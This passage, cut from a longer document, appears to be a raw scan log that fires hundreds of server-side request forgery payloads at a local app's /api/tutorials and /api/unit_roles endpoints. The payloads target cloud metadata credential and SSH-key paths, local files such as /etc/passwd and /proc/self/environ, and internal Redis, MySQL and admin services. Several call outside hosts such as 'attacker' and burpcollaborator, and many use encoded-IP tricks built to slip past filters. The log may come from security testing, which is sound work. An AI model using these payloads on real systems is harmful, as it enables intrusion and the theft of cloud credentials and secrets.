`http://localhost:4200/api/tutorials?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/tutorials?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/tutorials?url=0%2F` +- Testing: `http://localhost:4200/api/tutorials?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/tutorials?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tutorials?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tutorials?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/tutorials?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/unit_roles +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/unit_roles?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/unit_roles?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/unit_roles?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=0` +- Testing: `http://localhost:4200/api/unit_roles?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/unit_roles?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/unit_roles?url=127.127.127.127` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.1.3` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.0` +- Testing: `http://localhost:4200/api/unit_roles?url=2130706433` +- Testing: `http://localhost:4200/api/unit_roles?url=017700000001` +- Testing: `http://localhost:4200/api/unit_roles?url=0x7f000001` +- Testing: `http://localhost:4200/api/unit_roles?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/unit_roles?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/unit_roles?url=` +- Testing: `http://localhost:4200/api/unit_roles?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/unit_roles?url=` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/unit_roles?url=` +- Testing: `http://localhost:4200/api/unit_roles?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/unit_roles?url=` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/unit_roles?url=` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/unit_roles?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/unit_roles?url=google.com.localhost` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/unit_roles?url=` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/unit_roles?url=` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/unit_roles?url=` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/unit_roles?url=localtest.me` +- Testing: `http://localhost:4200/api/unit_roles?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/unit_roles?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/unit_roles?url=2130706433%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=3232235521%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=3232235777%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/unit_roles?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1` +- Testing: `http://localhost:4200/api/unit_roles?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/unit_roles?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/unit_roles?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/unit_roles?url=0%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.1` +- Testing: `http://localhost:4200/api/unit_roles?url=localtest.me` +- Testing: `http://localhost:4200/api/unit_roles?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/unit_roles?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/unit_roles?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/unit_roles?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/unit_roles?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/unit_roles?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/unit_roles?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/unit_roles?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/unit_roles?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.1.3` +- Testing: `http://localhost:4200/api/unit_roles?url=0` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.1` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost` +- Testing: `http://localhost:4200/api/unit_roles?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/unit_roles?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/unit_roles?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/unit_roles?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/unit_roles?url=7F000001` +- Testing: `http://localhost:4200/api/unit_roles?url=2130706433` +- Testing: `http://localhost:4200/api/unit_roles?url=6425673729` +- Testing: `http://localhost:4200/api/unit_roles?url=127001` +- Testing: `http://localhost:4200/api/unit_roles?url=127_0._0_1` +- Testing: `http://localhost:4200/api/unit_roles?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/unit_roles?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/unit_roles?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/unit_roles?url=localtest.me` +- Testing: `http://localhost:4200/api/unit_roles?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/unit_roles?url=127.127.127.127` +- Testing: `http://localhost:4200/api/unit_roles?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/unit_roles?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/unit_roles?url=0x7f000001` +- Testing: `http://localhost:4200/api/unit_roles?url=017700000001` +- Testing: `http://localhost:4200/api/unit_roles?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/unit_roles?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/unit_roles?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/unit_roles?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/unit_roles?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/unit_roles?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/unit_roles?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/unit_roles?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/unit_roles?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/unit_roles?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254` +- Testing: `http://localhost:4200/api/unit_roles?url=2852039166` +- Testing: `http://localhost:4200/api/unit_roles?url=7147006462` +- Testing: `http://localhost:4200/api/unit_roles?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/unit_roles?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/unit_roles?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/unit_roles?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/unit_roles?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/unit_roles?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/unit_roles?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/unit_roles?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/unit_roles?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/unit_roles?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/unit_roles?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/unit_roles?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/unit_roles?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/unit_roles?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/unit_roles?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/unit_roles?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/unit_roles?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/unit_roles?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/unit_roles?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/unit_roles?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/unit_roles?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/unit_roles?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/unit_roles?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/unit_roles?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.0` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1.1.1` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/unit_roles?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=3232235521` +- Testing: `http://localhost:4200/api/unit_roles?url=3232235777` +- Testing: `http://localhost:4200/api/unit_roles?url=425.510.425.510` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/unit_roles?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/unit_roles?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/unit_roles?url=instance-data` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A22` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A443` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/unit_roles?url=loopback` +- Testing: `http://localhost:4200/api/unit_roles?url=loopback%3A22` +- Testing: `http://localhost:4200/api/unit_roles?url=loopback%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=loopback%3A443` +- Testing: `http://localhost:4200/api/unit_roles?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/unit_roles?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/unit_roles?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/unit_roles?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/unit_roles?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/unit_roles?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/unit_roles?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/unit_roles?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/unit_roles?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/unit_roles?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/unit_roles?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/unit_roles?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/unit_roles?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/unit_roles?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1%3A80` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/unit_roles?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: 